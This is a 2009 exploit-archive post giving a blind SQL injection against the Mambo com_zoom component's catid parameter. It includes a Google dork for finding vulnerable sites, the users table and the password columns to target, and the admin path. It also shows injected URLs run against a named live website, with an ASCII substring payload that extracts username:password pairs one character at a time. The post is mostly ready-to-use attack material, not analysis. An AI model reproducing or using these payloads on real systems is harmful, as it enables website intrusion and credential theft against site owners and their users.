[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mambo Component com_zoom (catid) Blind SQL Injection Vulnerability
# Published : 2009-09-04
# Author : boom3rang
# Previous Title : MundiMail 0.8.2 Remote Code Execution
# Next Title : Zeroboard 4.1 pl7 now_connect() Remote Code Execution Exploit


Mambo component com_zoom (catid) Blind SQL injection                                       [_][-][X] 
      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___        
     | |/ / || |/ __|___ / __| _  __     / / |_  )   /  / _        
     | ' <| __ | (_ |___| (__|   / _|  // /   / / () | () _, /       
     |_|__||_|___|    ___|_|____| _/_/   /_____/ __/ /_/        
                                                                           
                                                                         
      Red n'black i dress eagle on my chest. 
      It's good to be an ALBANIAN Keep my head up high for that flag i die. 
      Im proud to be an ALBANIAN
   ###################################################################    
    								          
       Author         	: boom3rang		 	                  
       Contact        	: boom3rang[at]live.com                          
       Greetz   	: H!tm@N - KHG - cHs

		  R.I.P redc00de		          
   -------------------------------------------------------------------    
    								          
                  Affected software description    	                  
             <name>zoom</name>
             <creationDate>20/01/2004</creationDate>
             <author>Mike de Boer</author>
             <authorEmail>mailme@mikedeboer.nl</authorEmail>
             <authorUrl>www.mikedeboer.nl</authorUrl>
             <version>2.0</version>			          
   -------------------------------------------------------------------    
    								          
    [~] SQLi :						                  
    								          
    http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]           
                                                                 
    [~]Google Dork :		   				                  
    
    inurl:com_zoom inurl:"imgid"						    
    						          
   -------------------------------------------------------------------    
    								          
    [~] Table_NAME  =  mos_users
    [~] Column_NAME =  username - password 			                  								          
   -------------------------------------------------------------------    
    								          
    [~] Admin Path :					                  
    								          
    http://www.TARGET.com/administrator

   ===================================================================	
	                          = POC =
   ===================================================================    

        
    [~] Live Demo:
    ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/*    --> True
   ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/*    --> False

   -------------------------------------------------------------------

    [~] ASCII 
   index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

   -------------------------------------------------------------------
    
    [~] Live Demo ASCII

      True
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96		
      
      False
   http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97

   Like we see, the first charter of username is 'a'	char(97)=a
   Now you can change the second limit to find other charters, Good Luck...	

note:
<name>zoom</name>
<creationDate>20/01/2004</creationDate>
<author>Mike de Boer</author>
<authorEmail>mailme@mikedeboer.nl</authorEmail>
<authorUrl>www.mikedeboer.nl</authorUrl>
<version>2.0</version>

# www.Syue.com [2009-09-04]